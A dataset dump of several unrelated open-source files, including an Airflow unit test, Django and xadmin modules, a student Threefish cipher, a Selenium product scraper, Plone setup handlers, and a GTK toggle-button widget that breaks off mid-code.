wndhydrnt/airflow | tests/ti_deps/deps/test_valid_state_dep.py | 15 | 1835 | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
from datetime import datetime
from mock import Mock
from airflow import AirflowException
from airflow.ti_deps.deps.valid_state_dep import ValidStateDep
from airflow.utils.state import State
class ValidStateDepTest(unittest.TestCase):
def test_valid_state(self):
"""
Valid state should pass this dep
"""
ti = Mock(state=State.QUEUED, end_date=datetime(2016, 1, 1))
self.assertTrue(ValidStateDep({State.QUEUED}).is_met(ti=ti))
def test_invalid_state(self):
"""
Invalid state should fail this dep
"""
ti = Mock(state=State.SUCCESS, end_date=datetime(2016, 1, 1))
self.assertFalse(ValidStateDep({State.FAILED}).is_met(ti=ti))
def test_no_valid_states(self):
"""
If there are no valid states the dependency should throw
"""
ti = Mock(state=State.SUCCESS, end_date=datetime(2016, 1, 1))
with self.assertRaises(AirflowException):
ValidStateDep({}).is_met(ti=ti)
| apache-2.0 | -8,289,935,792,905,820,000 | 34.980392 | 69 | 0.700817 | false | 3.963283 | true | false | false |
BUPT-OJ-V4/BOJ-V4 | problem/forms.py | 1 | 1986 | #encoding: utf-8
from django import forms
from django_select2.forms import ModelSelect2MultipleWidget
# from django.contrib.auth.models import Group
from .models import Problem, ProblemTag
from ojuser.models import GroupProfile
class ProblemForm(forms.ModelForm):
is_spj = forms.NullBooleanField(widget=forms.CheckboxInput(), initial=False)
tags = forms.ModelMultipleChoiceField(required=False, queryset=ProblemTag.objects.all(),
widget=ModelSelect2MultipleWidget(
search_fields=[
'name__icontains',
'nickname__icontains',
]))
groups = forms.ModelMultipleChoiceField(required=True, queryset=GroupProfile.objects.all(),
widget=ModelSelect2MultipleWidget(
search_fields=[
'name__icontains',
'nickname__icontains'
]
))
class Meta:
model = Problem
exclude = ["superadmin", "is_checked", "created_time", "last_updated_time", "desc",
"code_length_limit"]
widgets = {
'groups': ModelSelect2MultipleWidget(
search_fields=[
'name__icontains',
'nickname__icontains',
]
),
'tags': ModelSelect2MultipleWidget(
search_fields=[
'name__icontains'
]
)
}
def __init__(self, *args, **kwargs):
super(ProblemForm, self).__init__(*args, **kwargs)
self.fields['title'].label = u"题目"
self.fields['time_limit'].label = u"运行时间限制"
self.fields['memory_limit'].label = u"运行时间限制"
self.fields['groups'].label = u"所属用户组"
| mit | 3,346,247,374,446,407,700 | 36.461538 | 95 | 0.50308 | false | 4.87 | false | false | false |
cgcgbcbc/django-xadmin | xadmin/plugins/chart.py | 17 | 5683 |
import datetime
import decimal
import calendar
from django.template import loader
from django.http import HttpResponseNotFound
from django.core.serializers.json import DjangoJSONEncoder
from django.http import HttpResponse
from django.utils.encoding import smart_unicode
from django.db import models
from django.utils.http import urlencode
from django.utils.translation import ugettext_lazy as _, ugettext
from xadmin.sites import site
from xadmin.views import BaseAdminPlugin, ListAdminView
from xadmin.views.dashboard import ModelBaseWidget, widget_manager
from xadmin.util import lookup_field, label_for_field, force_unicode, json
@widget_manager.register
class ChartWidget(ModelBaseWidget):
widget_type = 'chart'
description = _('Show models simple chart.')
template = 'xadmin/widgets/chart.html'
widget_icon = 'fa fa-bar-chart-o'
def convert(self, data):
self.list_params = data.pop('params', {})
self.chart = data.pop('chart', None)
def setup(self):
super(ChartWidget, self).setup()
self.charts = {}
self.one_chart = False
model_admin = self.admin_site._registry[self.model]
chart = self.chart
if hasattr(model_admin, 'data_charts'):
if chart and chart in model_admin.data_charts:
self.charts = {chart: model_admin.data_charts[chart]}
self.one_chart = True
if self.title is None:
self.title = model_admin.data_charts[chart].get('title')
else:
self.charts = model_admin.data_charts
if self.title is None:
self.title = ugettext(
"%s Charts") % self.model._meta.verbose_name_plural
def filte_choices_model(self, model, modeladmin):
return bool(getattr(modeladmin, 'data_charts', None)) and \
super(ChartWidget, self).filte_choices_model(model, modeladmin)
def get_chart_url(self, name, v):
return self.model_admin_url('chart', name) + "?" + urlencode(self.list_params)
def context(self, context):
context.update({
'charts': [{"name": name, "title": v['title'], 'url': self.get_chart_url(name, v)} for name, v in self.charts.items()],
})
# Media
def media(self):
return self.vendor('flot.js', 'xadmin.plugin.charts.js')
class JSONEncoder(DjangoJSONEncoder):
def default(self, o):
if isinstance(o, (datetime.date, datetime.datetime)):
return calendar.timegm(o.timetuple()) * 1000
elif isinstance(o, decimal.Decimal):
return str(o)
else:
try:
return super(JSONEncoder, self).default(o)
except Exception:
return smart_unicode(o)
class ChartsPlugin(BaseAdminPlugin):
data_charts = {}
def init_request(self, *args, **kwargs):
return bool(self.data_charts)
def get_chart_url(self, name, v):
return self.admin_view.model_admin_url('chart', name) + self.admin_view.get_query_string()
# Media
def get_media(self, media):
return media + self.vendor('flot.js', 'xadmin.plugin.charts.js')
# Block Views
def block_results_top(self, context, nodes):
context.update({
'charts': [{"name": name, "title": v['title'], 'url': self.get_chart_url(name, v)} for name, v in self.data_charts.items()],
})
nodes.append(loader.render_to_string('xadmin/blocks/model_list.results_top.charts.html', context_instance=context))
class ChartsView(ListAdminView):
data_charts = {}
def get_ordering(self):
if 'order' in self.chart:
return self.chart['order']
else:
return super(ChartsView, self).get_ordering()
def get(self, request, name):
if name not in self.data_charts:
return HttpResponseNotFound()
self.chart = self.data_charts[name]
self.x_field = self.chart['x-field']
y_fields = self.chart['y-field']
self.y_fields = (
y_fields,) if type(y_fields) not in (list, tuple) else y_fields
datas = [{"data":[], "label": force_unicode(label_for_field(
i, self.model, model_admin=self))} for i in self.y_fields]
self.make_result_list()
for obj in self.result_list:
xf, attrs, value = lookup_field(self.x_field, obj, self)
for i, yfname in enumerate(self.y_fields):
yf, yattrs, yv = lookup_field(yfname, obj, self)
datas[i]["data"].append((value, yv))
option = {'series': {'lines': {'show': True}, 'points': {'show': False}},
'grid': {'hoverable': True, 'clickable': True}}
try:
xfield = self.opts.get_field(self.x_field)
if type(xfield) in (models.DateTimeField, models.DateField, models.TimeField):
option['xaxis'] = {'mode': "time", 'tickLength': 5}
if type(xfield) is models.DateField:
option['xaxis']['timeformat'] = "%y/%m/%d"
elif type(xfield) is models.TimeField:
option['xaxis']['timeformat'] = "%H:%M:%S"
else:
option['xaxis']['timeformat'] = "%y/%m/%d %H:%M:%S"
except Exception:
pass
option.update(self.chart.get('option', {}))
content = {'data': datas, 'option': option}
result = json.dumps(content, cls=JSONEncoder, ensure_ascii=False)
return HttpResponse(result)
site.register_plugin(ChartsPlugin, ListAdminView)
site.register_modelview(r'^chart/(.+)/$', ChartsView, name='%s_%s_chart')
| bsd-3-clause | -6,073,751,838,963,960,000 | 34.742138 | 136 | 0.604082 | false | 3.801338 | false | false | false |
Henrique1792/Trab1_EngSeg | threefish.py | 1 | 6409 | #Funções de bitwise:
#Como tivemos problemas de tipagem, utilizamos um tipo próprio para a criptografia
#No caso, um array de 1s e 0s representando bits.
#E, claro, tivemos que criar operadores pra agir sobre esse novo "tipo".
def xor( a, b ):
result = [0] * 8
for i in range( 7, -1, -1 ):
result[i] = a[i] ^ b[i]
return result
def mod( a, b ):
result = [0] * 8
for i in range( 7, -1, -1 ):
result[i] = a[i] & b[i]
return result
def add( a, b ):
result = [0] * 8
c = 0
for i in range( 7, -1, -1 ):
result[i] = ( a[i] ^ b[i] ) ^ c
c = ( ( a[i] | c ) & b[i] ) | ( a[i] & ( b[i] | c ) )
return result
def comp( a ):
return add( xor( a, [1,1,1,1,1,1,1,1]), [0,0,0,0,0,0,0,1])
def rol( a, b ):
result = [0] * 8
q = b % 8
for i in range( 7, -1, -1 ):
if ( i - q ) >= 0:
result[ i - q ] = a[i]
else:
result[ 8 + i - q ] = a[i]
return result
def ror( a, b ):
result = [0] * 8
q = b % 8
for i in range( 7, -1, -1 ):
if ( i + q ) < 8:
result[ i + q ] = a[i]
else:
result[ i + q - 8 ] = a[i]
return result
#Funções da criptografia em si:
def permute( v, c = True ):
p = { True: [2,1,4,7,6,5,0,3], False : [6,1,0,7,2,5,4,3] }
aux = [ v[i] for i in p[c] ]
return aux
def mix( x0, x1, j, d, c = True):
R = [[46,33,17,44,39,13,25,8],
[36,27,49,9,30,50,29,35],
[19,14,36,54,34,10,39,56],
[37,42,39,56,24,17,43,22]] #Mais constantes fixas da descrição do algorítmo
if( c ):
y0 = add( x0, x1 )
y1 = xor( rol( x1, R[j][d%8] ), y0 )
else:
y1 = ror( xor(x0, x1), R[j][d%8] )
y0 = add(x0, comp( y1 ) ) #sub = add( a, ~b )
return y0, y1
def key_schedule( k, t ):
ks = []
kn = to_bit( 0x1BD11BDAA9FC1A22.to_bytes( 8, "big" ) ) #Tem um pq dessa constante em específico no pdf do algorítmo. É basicamente um nothing-up-my-sleeve number.
for i in range( 7 ): #Nw - 1
kn = xor( kn[0], k[i])
t2 = xor( t[1], t[2] )
t.extend(t2)
k.extend(kn)
for i in range( 19 ): #Nr/4 + 1
s = [None] * 8
for j in range( 5 ):
s[j] = k[ ( i + j ) % 9 ]
s[5] = add( k[ ( i + 5 ) % 9 ], t[ i % 3 ] )
s[6] = add( k[ ( i + 6 ) % 9 ], t[ ( i + 1 ) % 3 ] )
s[7] = add( k[ ( i + 7 ) % 9 ], to_bit( [i] )[0] )
ks.append( s )
return ks
#Algoritmo implementado a partir das instruções oficiais, disponiveis em:
#https://www.schneier.com/academic/paperfiles/skein1.3.pdf
#Nossa sugestão para melhorar seria adicionar um timestamp junto a mensagem a ser cifrada, que seria análisado pela aplicação.
#Isso impediria cópias de mensagens sniffadas.
def Threefish( w, k, t, c = True ):
w = to_bit( w )
k = to_bit( k )
t = to_bit( t )
ks = key_schedule( k, t )
result = []
for k in range( 0, len( w ), 8 ):
block = w[k:k+8]
if( c ):
for i in range( 72 ):
if( ( i % 4 ) == 0 ):
for j in range( 8 ):
block[j] = add( block[j], ks[int( i/4 )][j] )
for j in range( 4 ):
block[2*j], block[2*j+1] = mix( block[2*j], block[2*j+1], j, i, True )
block = permute( block, True )
else:
for i in range( 71, -1, -1 ):
block = permute( block, False )
for j in range( 4 ):
block[2*j], block[2*j+1] = mix( block[2*j], block[2*j+1], j, i, False )
if( ( i % 4 ) == 0 ):
for j in range( 8 ):
block[j] = add( block[j], comp( ks[int( i/4 )][j] ) )
result.extend( block )
if c:
return from_bit( result )
else:
padwan = ""
for digit in from_bit( result ):
padwan += chr( digit )
return pad( padwan, False )
#Abaixo, funções de conversão de string/int para um vetor de bits.
#Por problemas de tipagem, bytes davam erro no endereçamento, strings nas operações, e inteiros no numero de casas.
#(BTW, a função nativa bin() retorna uma string, por isso tive q fazer na mão)
#Esse ficou bonito ;)
def to_bit( data ):
if( isinstance( data, str ) ):
data = pad( data )
data = [ ord( data[i] ) for i in range( len( data ) ) ]
return [ [0] * ( 8 - len( bin( datum )[2:] ) ) + [ 1 if digit=='1' else 0 for digit in bin( datum )[2:] ] for datum in data ]
#Esse nem tanto =/
def from_bit( data ):
result = []
for datum in data:
c = 0
for i in range( 8 ):
c += datum[ 7 - i ] << i
result.append( c )
return result
#Padding especial que eu vi por aí mas não lembro o nome
#Adiciona como algarismo de pad o numero de casas cobertas, assim nunca exclui um caractér errado
#(Exceto caso a frase termine com um "1" e seja múltiplo de 8. Mas é bem mais border q acabar com 0, dos pads normais)
def pad( w, c = True):
result = w * 1
if c:
i = 8 - ( len( result ) % 8 )
if i < 8:
result += str(i) * i
else:
try:
p = int( result[-1] )
for i in range( -1, -p - 1, -1 ):
if( int( result[ i ] ) != p ):
raise
result = result[:-p]
except:
return result #Falha no padding
return result
def example_use( w = "Frase de Exemplo", k = "gurulhu!", t = "oi"):
print("Plaintext: ", w, "\nKey: ", k, "\nTweak: ", t )
cy = Threefish( w, k, t )
print("\nCypher:", [ chr( i ) for i in cy] )
cy = Threefish( cy, k, t, False )
print("\nResult: ", cy )
if __name__ == "__main__":
import sys
if len( sys.argv ) < 5:
print("Usage: threefish [plaintext] [key] [tweak] [encript]")
else:
if( sys.argv[4] in ["FALSE", "False", "false", "F", "f", "0", "D", "U", "d", "u", 0] ):
with open( sys.argv[1] ) as plainfile:
plaintext = [ int( c ) for c in plainfile.readlines() ]
print( Threefish( w = plaintext, k = sys.argv[2], t = sys.argv[3], c = False ) )
else:
with open( sys.argv[1] ) as plainfile:
plaintext = plainfile.read()
[ print( c ) for c in Threefish( w = plaintext, k = sys.argv[2], t = sys.argv[3] ) ]
| gpl-3.0 | 1,621,412,275,519,312,100 | 32.387435 | 166 | 0.488317 | false | 2.660409 | false | false | false |
brkrishna/freelance | getpopulrrewards_com/parser.py | 1 | 9007 | # -- coding: utf-8 --
#-------------------------------------------------------------------------------
# Name: parser
# Purpose:
#
# Author: Ramakrishna
#
# Created: 08/09/2015
# Copyright: (c) Ramakrishna 2015
# Licence: <your licence>
#-------------------------------------------------------------------------------
import sqlite3, time
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException, StaleElementReferenceException
from selenium.webdriver.common.keys import Keys
from bs4 import BeautifulSoup, SoupStrainer
import urllib
BASE_URL = 'https://www.getpopulrrewards.com'
def main():
conn = driver = None
try:
driver = webdriver.Firefox()
conn = sqlite3.connect("gppr.db3")
cur = conn.cursor()
cur.execute("select id, catg, subcatg from links where done = 0 order by id")
review_urls = cur.fetchall()
driver.get('https://www.getpopulrrewards.com')
time.sleep(3)
for url in review_urls:
id = url[0]
catg = url[1]
subcatg = url[2]
next_page = ''
print catg, subcatg
try:
driver.find_element_by_link_text('SHOP ALL').click()
time.sleep(1)
driver.find_element_by_link_text(catg).click()
time.sleep(1)
driver.find_element_by_link_text(subcatg).click()
time.sleep(1)
except NoSuchElementException as e:
print(e.__doc__)
print(e.args)
pass
try:
main_window = driver.current_window_handle
try:
pager = driver.find_element_by_class_name("pagination")
lis = pager.find_elements_by_tag_name("li")
if lis != None and len(lis) >= 3:
l = lis[3]
if l.find_element_by_tag_name('a') != None:
next_page = l.find_element_by_tag_name('a')
else:
next_page = '' # empty string as we want it to loop through the first page
except NoSuchElementException as e:
next_page = ''
print(e.__doc__)
print(e.args)
pass
while next_page != None:
links = driver.find_elements_by_class_name("shortDescription")
time.sleep(1)
for link in links:
name = points = item_no = prod_url = descr = notes = None
elem = link.find_element_by_tag_name('a')
elem.send_keys(Keys.CONTROL + Keys.RETURN)
driver.find_element_by_tag_name('body').send_keys(Keys.CONTROL + Keys.TAB)
time.sleep(1)
second_window = driver.current_window_handle
driver.switch_to_window(second_window)
soup = BeautifulSoup(driver.page_source, parse_only=SoupStrainer('body'))
if soup != None:
try:
div_name = soup.find('span', {'id':'itemName'})
if div_name != None:
name = div_name.text.strip()
except NoSuchElementException as e:
print(e.__doc__)
print(e.args)
print "name not found"
pass
try:
div_item_no = soup.find('span', {'id':'itemNo'})
if div_item_no != None:
item_no = div_item_no.text
except NoSuchElementException as e:
print(e.__doc__)
print(e.args)
print "item no not found"
pass
selected = soup.find('div', {'state':'selected'})
if selected != None:
url = selected['style']
prod_url = url[url.find("https"):url.find("?")]
#Save image locally
urllib.urlretrieve(prod_url, "images/" + item_no + ".jpg")
try:
desc = soup.find('div', {'id':'itemDescr'})
if desc != None:
descr = desc.getText("$$$")
'''
for d in desc.contents:
if d != None:
d = str(d)
descr += d.strip() if d != None else ''
'''
except NoSuchElementException as e:
print(e.__doc__)
print(e.args)
print "desc not found"
pass
'''
try:
note = soup.find('div', {'class':'itemSummary'})
if note != None:
note = note.contents
for n in note:
n = n.text.encode('ascii', 'ignore').decode('ascii').replace('\n','').strip()
notes += n + " "
except NoSuchElementException as e:
print(e.__doc__)
print(e.args)
print "item summary not found"
pass
'''
try:
div_points = soup.find_all('p', {'class':'points'})
if div_points != None:
for p in div_points:
if p.text.strip() != '':
points = p.text.strip()
break
except NoSuchElementException as e:
print(e.__doc__)
print(e.args)
print "points not found"
pass
sql = "insert into records(name, catg, subcatg, points, item_no, img_url, descr) values (?,?,?,?,?,?,?)"
#print name, catg, subcatg, points, item_no, prod_url, descr
print catg, subcatg, name
if name != None and points != None and item_no != None and prod_url != None:
cur.execute(sql, (name, catg, subcatg, points, item_no, prod_url, descr))
driver.find_element_by_tag_name('body').send_keys(Keys.CONTROL + 'w')
time.sleep(1)
driver.switch_to_window(main_window)
cur.execute("update links set done = 1 where id = ? and done = 0", (str(id),))
conn.commit()
try:
next_page = None
pager = driver.find_element_by_class_name("pagination")
lis = pager.find_elements_by_tag_name("li")
if lis != None and len(lis) >= 3:
l = lis[3]
if l.find_element_by_tag_name('a') != None:
next_page = l.find_element_by_tag_name('a')
next_page.click()
else:
next_page = None
except IndexError as e:
print(e.__doc__)
print(e.args)
pass
except NoSuchElementException as e:
print(e.__doc__)
print(e.args)
pass
driver.switch_to_window(main_window)
except NoSuchElementException as e:
print(e.__doc__)
print(e.args)
pass
except Exception as e:
print(e.__doc__)
print(e.args)
finally:
if conn != None:
conn.commit()
conn.close()
if driver != None:
driver.close()
if __name__ == '__main__':
main()
| gpl-2.0 | 3,739,803,283,532,826,000 | 40.316514 | 132 | 0.375597 | false | 5.239674 | false | false | false |
chrigl/docker-library | plone-chrigl-debian/src/collective.geo.file/collective/geo/file/setuphandlers.py | 1 | 2357 | import logging
from zope.interface import alsoProvides
from Products.CMFPlone.utils import getToolByName
from Products.MimetypesRegistry.MimeTypeItem import MimeTypeItem
from collective.geo.file.interfaces import IGisFile
# The profile id of your package:
PROFILE_ID = 'profile-collective.geo.file:default'
gis_mimetypes = [
{'name': 'application/vnd.google-earth.kml+xml',
'extensions': ('kml',),
'globs': ('*.kml',),
'icon_path': 'text.png',
'binary': True,
'mimetypes': ('application/vnd.google-earth.kml+xml',)},
{'name': 'application/gpx+xml',
'extensions': ('gpx',),
'globs': ('*.gpx',),
'icon_path': 'text.png',
'binary': True,
'mimetypes': ('application/gpx+xml',)}
]
def do_nothing(context, logger=None):
if logger is None:
# Called as upgrade step: define our own logger.
logger = logging.getLogger('collective.geo.file')
logger.info("Empty upgrade step")
def attach_igisfile(context, logger=None):
catalog = getToolByName(context, 'portal_catalog')
brains = catalog(portal_type='File')
for brain in brains:
ob = brain.getObject()
mimetype = ob.content_type
if mimetype in ['application/vnd.google-earth.kml+xml',
'application/gpx+xml']:
if not IGisFile.providedBy(ob):
alsoProvides(ob, IGisFile)
reindex = True
def add_extract_menue(context, logger=None):
if logger is None:
# Called as upgrade step: define our own logger.
logger = logging.getLogger('collective.geo.file')
setup = getToolByName(context, 'portal_setup')
setup.runImportStepFromProfile(PROFILE_ID, 'actions')
def import_various(context):
"""Import step for configuration that is not handled in xml files.
"""
# Only run step if a flag file is present
if context.readDataFile('collective.geo.file-default.txt') is None:
return
logger = context.getLogger('collective.geo.file')
site = context.getSite()
mimetypes_registry = getToolByName(site, 'mimetypes_registry')
all_mimetypes = mimetypes_registry.list_mimetypes()
for mtype in gis_mimetypes:
if mtype['name'] not in all_mimetypes:
logger.info('Registering mimetype %s' % mtype['name'])
mimetypes_registry.register(MimeTypeItem(**mtype))
| apache-2.0 | 6,949,837,277,970,015,000 | 33.661765 | 71 | 0.660585 | false | 3.659938 | false | false | false |
meawoppl/babyfood | babyfood/components/SMAResistor.py | 1 | 1557 | # From https://www.digikey.com/Web%20Export/Supplier%20Content/Vishay_8026/PDF/VishayBeyschlag_SolderPad.pdf?redirected=1
from babyfood.pcb.PCBUnits import mil
from babyfood.features.basic import CenteredRectangle, FilledCenteredRectangle
from babyfood.components.ABC import AbstractSMAComponent
resistorsParams = {
"0102": (0.65, 1.10, 1.40, 2.85),
"0204": (1.50, 1.25, 1.75, 4.00),
"0207": (2.80, 2.20, 2.20, 7.20),
"0402": (0.25, 0.60, 0.55, 1.45),
"0603": (0.50, 0.95, 0.95, 2.40),
"0805": (0.65, 1.10, 1.40, 2.85),
"1206": (1.50, 1.25, 1.75, 4.00)}
class SMAResistor(AbstractSMAComponent):
def __init__(self, codeString):
# Names on datasheet ref'ed above
_g, _y, _x, _z = resistorsParams[codeString]
# Names useful to us
self._w = _y
self._h = _x
shift = (_g / 2) + (_y / 2)
self._outline = int(codeString[0:2]) * 0.254, int(codeString[2:4]) * 0.254
print(self._outline)
self._centers = ((-shift, 0),
(+shift, 0))
def draw(self, ctx):
pad = FilledCenteredRectangle(self._w, self._h)
mask = FilledCenteredRectangle(self._w - 0.1, self._h - 0.1)
outline = CenteredRectangle(*self._outline)
ctx.setActiveLayer("overlay")
outline.draw(ctx)
for cp in self._centers:
with ctx.transform.translation(*cp):
ctx.setActiveLayer("copper")
pad.draw(ctx)
ctx.setActiveLayer("mask")
mask.draw(ctx)
| bsd-2-clause | 642,509,527,637,811,000 | 32.12766 | 121 | 0.574181 | false | 2.91573 | false | false | false |
cathyyul/sumo | tools/output/analyze_teleports.py | 2 | 2656 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@file analyze_teleports.py
@author Jakob Erdmann
@date 2012-11-20
@version $Id: analyze_teleports.py 14425 2013-08-16 20:11:47Z behrisch $
Extract statistics from the warning outputs of a simulation run for plotting.
SUMO, Simulation of Urban MObility; see http://sumo-sim.org/
Copyright (C) 2008-2013 DLR (http://www.dlr.de/) and contributors
All rights reserved
"""
import os,sys
import re
from collections import defaultdict
def parse_log(logfile, edges=True, aggregate=3600):
print "Parsing %s" % logfile
reFrom = re.compile("lane='([^']*)'")
reTime = re.compile("time=(\d*)\.")
# counts per lane
waitingCounts = defaultdict(lambda:0)
collisionCounts = defaultdict(lambda:0)
# counts per step
waitingStepCounts = defaultdict(lambda:0)
collisionStepCounts = defaultdict(lambda:0)
for line in open(logfile):
try:
if "Warning: Teleporting vehicle" in line:
edge = reFrom.search(line).group(1)
time = reTime.search(line).group(1)
if edges:
edge = edge[:-2]
if "collision" in line:
collisionCounts[edge] += 1
collisionStepCounts[int(time) / aggregate] += 1
else:
waitingCounts[edge] += 1
waitingStepCounts[int(time) / aggregate] += 1
except:
print sys.exc_info()
sys.exit("error when parsing line '%s'" % line)
return (waitingCounts, collisionCounts,
waitingStepCounts, collisionStepCounts)
def print_counts(countDict, label):
counts = [(v,k) for k,v in countDict.items()]
counts.sort()
print counts
print label, 'total:', sum(countDict.values())
def main(logfile):
waitingCounts, collisionCounts, waitingStepCounts, collisionStepCounts = parse_log(logfile)
print_counts(waitingCounts, 'waiting')
print_counts(collisionCounts, 'collisions')
# generate plot
min_step = min(min(waitingStepCounts.keys()),
min(collisionStepCounts.keys()))
max_step = max(max(waitingStepCounts.keys()),
max(collisionStepCounts.keys()))
plotfile = logfile + '.plot'
with open(plotfile, 'w') as f:
f.write("# plot '%s' using 1:2 with lines title 'waiting', '%s' using 1:3 with lines title 'collisions'\n" % (
plotfile, plotfile))
for step in range(min_step, max_step + 1):
print >>f, ' '.join(map(str,[step, waitingStepCounts[step], collisionStepCounts[step]]))
if __name__ == "__main__":
main(*sys.argv[1:])
| gpl-3.0 | 5,773,483,690,804,837,000 | 34.891892 | 118 | 0.617846 | false | 3.704324 | false | false | false |
trevor/calendarserver | txdav/caldav/datastore/scheduling/addressmapping.py | 1 | 3402 | ##
# Copyright (c) 2005-2014 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
from twisted.internet.defer import inlineCallbacks, returnValue
from twext.python.log import Logger
from twistedcaldav.config import config
from twistedcaldav.memcacher import Memcacher
from txdav.caldav.datastore.scheduling.caldav.delivery import ScheduleViaCalDAV
from txdav.caldav.datastore.scheduling.cuaddress import RemoteCalendarUser, EmailCalendarUser, InvalidCalendarUser
from txdav.caldav.datastore.scheduling.delivery import DeliveryService
from txdav.caldav.datastore.scheduling.imip.delivery import ScheduleViaIMip
from txdav.caldav.datastore.scheduling.ischedule.delivery import ScheduleViaISchedule
__all__ = [
"ScheduleAddressMapper",
"mapper",
]
log = Logger()
"""
Handle mapping a calendar user address to a schedule delivery type.
"""
class ScheduleAddressMapper(object):
"""
Class that maps a calendar user address into a delivery service type.
"""
def __init__(self):
# We are going to cache mappings whilst running
self.cache = Memcacher("ScheduleAddressMapper", no_invalidation=True)
@inlineCallbacks
def getCalendarUser(self, cuaddr):
# Get the type
cuaddr_type = (yield self.getCalendarUserServiceType(cuaddr))
if cuaddr_type == DeliveryService.serviceType_caldav:
returnValue(InvalidCalendarUser(cuaddr))
elif cuaddr_type == DeliveryService.serviceType_ischedule:
returnValue(RemoteCalendarUser(cuaddr))
elif cuaddr_type == DeliveryService.serviceType_imip:
returnValue(EmailCalendarUser(cuaddr))
else:
returnValue(InvalidCalendarUser(cuaddr))
@inlineCallbacks
def getCalendarUserServiceType(self, cuaddr):
# Try cache first
cuaddr_type = (yield self.cache.get(str(cuaddr)))
if cuaddr_type is None:
serviceTypes = (ScheduleViaCalDAV,)
if config.Scheduling[DeliveryService.serviceType_ischedule]["Enabled"]:
serviceTypes += (ScheduleViaISchedule,)
if config.Scheduling[DeliveryService.serviceType_imip]["Enabled"]:
serviceTypes += (ScheduleViaIMip,)
for service in serviceTypes:
matched = (yield service.matchCalendarUserAddress(cuaddr))
if matched:
yield self.cache.set(str(cuaddr), service.serviceType())
returnValue(service.serviceType())
returnValue(cuaddr_type)
def isCalendarUserInMyDomain(self, cuaddr):
# Check whether it is a possible local address
def _gotResult(serviceType):
return serviceType == DeliveryService.serviceType_caldav
d = self.getCalendarUserServiceType(cuaddr)
d.addCallback(_gotResult)
return d
mapper = ScheduleAddressMapper()
| apache-2.0 | 3,453,919,102,478,652,000 | 33.714286 | 114 | 0.71017 | false | 4.123636 | false | false | false |
RachelJMorris/Text-to-Speech-projects | HowToUseEspeak/main.py | 3 | 1040 | # Run with Python 3
# install python3-espeak
# /usr/lib/python3/dist-packages/espeak/espeak.py
from espeak import espeak
import sys
done = False
while ( done == False ):
print()
print( "1. Display voices" )
print( "2. Speak text" )
print( "3. View espeak functions" )
choice = int( input( "What do you want to do? >> " ) )
print()
if ( choice == 1 ):
print( "VOICES" )
voices = espeak.list_voices()
print( "Identifier","Name","Gender","Age","Variant" )
for voice in voices:
print( "Name: ", voice.name )
print( "Identifier: ", voice.identifier )
print( "Gender: ", voice.gender )
print( "Age: ", voice.age )
print( "Variant: ", voice.variant )
print()
elif ( choice == 2 ):
print( "SPEAK" )
voice = input( "What voice do you want to use? >> " )
espeak.set_voice( voice )
text = input( "What do you want to say? >> " )
print( "Saying \"" + text + "\"" )
espeak.synth( text )
elif ( choice == 3 ):
print( "FUNCTIONS" )
for member in dir( espeak ):
print( member )
| mit | -700,674,754,371,552,100 | 21.12766 | 55 | 0.597115 | false | 2.773333 | false | false | false |
kevinmel2000/sl4a | python/src/Lib/test/test_undocumented_details.py | 56 | 1137 | from test.test_support import run_unittest, have_unicode
import unittest
import sys
class TestImplementationComparisons(unittest.TestCase):
def test_type_comparisons(self):
self.assertTrue(str < int or str > int)
self.assertTrue(int <= str or int >= str)
self.assertTrue(cmp(int, str) != 0)
self.assertTrue(int is int)
self.assertTrue(str == str)
self.assertTrue(int != str)
def test_cell_comparisons(self):
def f(x):
if x:
y = 1
def g():
return x
def h():
return y
return g, h
g, h = f(0)
g_cell, = g.func_closure
h_cell, = h.func_closure
self.assertTrue(h_cell < g_cell)
self.assertTrue(g_cell >= h_cell)
self.assertEqual(cmp(g_cell, h_cell), 1)
self.assertTrue(g_cell is g_cell)
self.assertTrue(g_cell == g_cell)
self.assertTrue(h_cell == h_cell)
self.assertTrue(g_cell != h_cell)
def test_main():
run_unittest(TestImplementationComparisons)
if __name__ == '__main__':
test_main()
| apache-2.0 | -8,986,443,526,133,241,000 | 28.153846 | 56 | 0.559367 | false | 3.632588 | true | false | false |
frc1418/2014 | driver_station/src/ui/widgets/toggle_button.py | 1 | 2782 | #
# This file is part of KwarqsDashboard.
#
# KwarqsDashboard is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3.
#
# KwarqsDashboard is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with KwarqsDashboard. If not, see <http://www.gnu.org/licenses/>.
#
import gtk
import gobject
from .image_button import ImageButton
class ToggleButton(gtk.HBox):
'''
Similar to a GTK CheckButton, but different. A different pixbuf is
shown depending on the button toggled state.
.. seems like they should already have this implemented, but I can't
find one.
'''
__gsignals__ = {
'toggled': (gobject.SIGNAL_ACTION, gobject.TYPE_NONE, ()),
}
def __init__(self, active_pixbuf, inactive_pixbuf, label=None, clickable=False, default=False):
'''
:param active_pixbuf: The pixbuf to be shown when the button is in the 'active' state
:param inactive_pixbuf: The pixbuf to be shown when the button is in the 'inactive' state
:param label: Text to show with the button
:param clickable: Does the button accept user input?
:param default: The default state for the button: True is active, False is inactive
'''
gtk.HBox.__init__(self)
self.set_spacing(5)
self.image_button = ImageButton()
self.pack_start(self.image_button, False, False)
self.active = not default
self.active_pixbuf = active_pixbuf
self.inactive_pixbuf = inactive_pixbuf
if clickable:
